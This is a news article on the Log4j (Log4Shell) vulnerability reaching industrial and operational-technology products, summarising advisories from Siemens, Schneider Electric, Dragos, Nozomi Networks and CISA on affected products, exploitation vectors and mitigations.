Log4j vulnerability now hits industrial sector, as CISA calls upon users to identify, mitigate, patch affected products
Siemens identified on Monday the presence of the Apache Log4j vulnerability in some of its product lines, which could potentially be exploited by remote unauthenticated attackers to execute code on vulnerable systems. The affected products include E-Car OC Cloud Application, EnergyIP, Industrial Edge Management App (IEM-App), Industrial Edge Management OS (IEM-OS), Industrial Edge Management Hub, LOGO! Soft Comfort, Mendix, MindSphere, Operation Scheduler, Siguard DSA, SIMATIC WinCC v7.4, Siveillance Command, Siveillance Control Pro, and Siveillance Vantage.
Data analyzed by industrial cybersecurity company Dragos has found that the Log4j vulnerability, which is both vendor-agnostic and affects both proprietary and open-source software, will leave several industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, and transportation.
In addition to identifying various mitigations, Siemens advised users to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens operational guidelines for industrial security.
Another industrial cybersecurity vendor, Schneider Electric, said in an advisory on Monday that it “continues to assess how the Log4j vulnerabilities affect its offers, and will update customers through its Cybersecurity Support Portal as product-specific mitigation information becomes available.”
The French vendor also advised customers to use an IoT/OT-aware network detection and response (NDR) solution and SIEM/SOAR solution to auto-discover and continuously monitor devices for anomalous or unauthorized behaviors, such as communication with unfamiliar local or remote hosts.
The Log4j 2 is an open-source Java logging library developed by the Apache Foundation deployed across enterprise apps and cloud services. Tracked as CVE-2021-44228 and dubbed ‘Log4Shell,’ the Log4j vulnerability is an unauthenticated remote code execution (RCE) security loophole that allows complete system takeover on systems using Log4j 2.0-beta9 up to 2.14.1. Apache has released Log4j 2.15.0 to resolve the vulnerability, which is trivial to exploit.
Dragos said that it “assesses with high confidence that this vulnerability will impact Operational Technology (OT) networks, based on the ubiquity of the library and the rapidly growing methodologies of exploitation,” according to a company blog post. “Dragos Intelligence has observed both attempted and successful exploitation of the Log4j vulnerability in the wild and based on these observations already coordinated a takedown of one of the malicious domains used in early exploitation attempts,” it added.
Log4j is found in open-source repositories used in numerous industrial applications, such as Object Linking and Embedding for Process Control (OPC) Foundation’s Unified Architecture (UA) Java Legacy, Dragos said. “Additionally, adversaries can leverage this vulnerability in proprietary Supervisory Control and Data Acquisition (SCADA) and Energy Management Systems (EMS) which make use of Java in their codebase,” it added.
Major OT vendors have begun to disclose the impact of this vulnerability on their software and equipment, and additional disclosures will continue as vendors work to identify the use of Log4j across their product lines, Dragos said. “Unfortunately, the nature of the Log4j vulnerability makes it challenging to identify potentially impacted servers on a given network. While network-facing services written in Java are most obviously at risk, the vulnerability can technically impact any server (including back-end resources) where user supplied data is processed and logged,” the company added.
While the Lightweight Directory Access Protocol (LDAP) attack vector received most of the initial attention, Dragos has observed attempted attacks using Domain Name System (DNS) and Remote Method Invocation (RMI) as well, and the list of potential protocols and methods for exploitation will continue to grow, according to Dragos.
“For an OT network incorporating robust segmentation, the risk from these protocols will be mitigated to an extent; however, OT elements such as SCADA/EMS configured for remote access may utilize LDAP for password management and therefore be vulnerable to exploitation, particularly by an adversary moving laterally within a network,” Dragos said. “OT networks with weak segmentation from business Information Technology (IT) networks will be most impacted by this vulnerability, even more so as additional protocols are discovered to enable exploitation,” it added.
Nozomi Networks, another industrial cybersecurity company, said on Tuesday that “the essence of the vulnerability lies in the fact that the log4j utility had message lookup substitution enabled by default. As a result, attackers can craft a special request that would make the utility remotely download and execute the payload,” according to a company blog post. “Other protocols like DNS, RMI and LDAPS may also be misused. This behavior has been fixed in the recent release of Apache Log4j 2.15.0,” it added.
The Cybersecurity and Security Agency (CISA) said on Monday that Log4j is widely used in a variety of consumer and enterprise services, websites, and applications, as well as in operational technology (OT) products, to log security and performance information. The agency identified that an unauthenticated remote hacker could exploit this vulnerability to take control of an affected system.
The security agency has asked vendors to identify, mitigate, and patch affected products using Log4j, and inform end-users of products that contain this vulnerability, and urge them to prioritize software updates.
Using the RCE vulnerability, affected versions of Log4j contain Java Naming and Directory Interface (JNDI) features that “do not protect against adversary-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI related endpoints,” CISA said. An adversary can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows the adversary to take full control over the system. The adversary can then steal information, launch ransomware, or conduct other malicious activity.
The severity of the Apache Log4j vulnerability is beginning to unravel in the industrial sector, as vendors begin to identify the presence of the cross-cutting vulnerability in their product lines.
The discovery of a critical flaw in the Apache Log4j software is nothing short of a Fukushima moment for the cybersecurity industry, Renaud Deraison, co-founder and CTO at Tenable, wrote in a company blog. “We’re discovering new apps every minute which use Log4j in one way or another. It affects not only the code you build, but also the third-party systems you have in place.”
“The irony of this flaw is that it could end up enabling attackers to exploit the very logging practices that are the bellwether of sound security practices: the more secure your organization is, the more you’ll log every action, which means you’re sitting on a bigger pool of logging data with the potential to be exploited,” Deraison added.
A complimentary guide to the who`s who in industrial cybersecurity tech & solutions
Free DownloadRelated
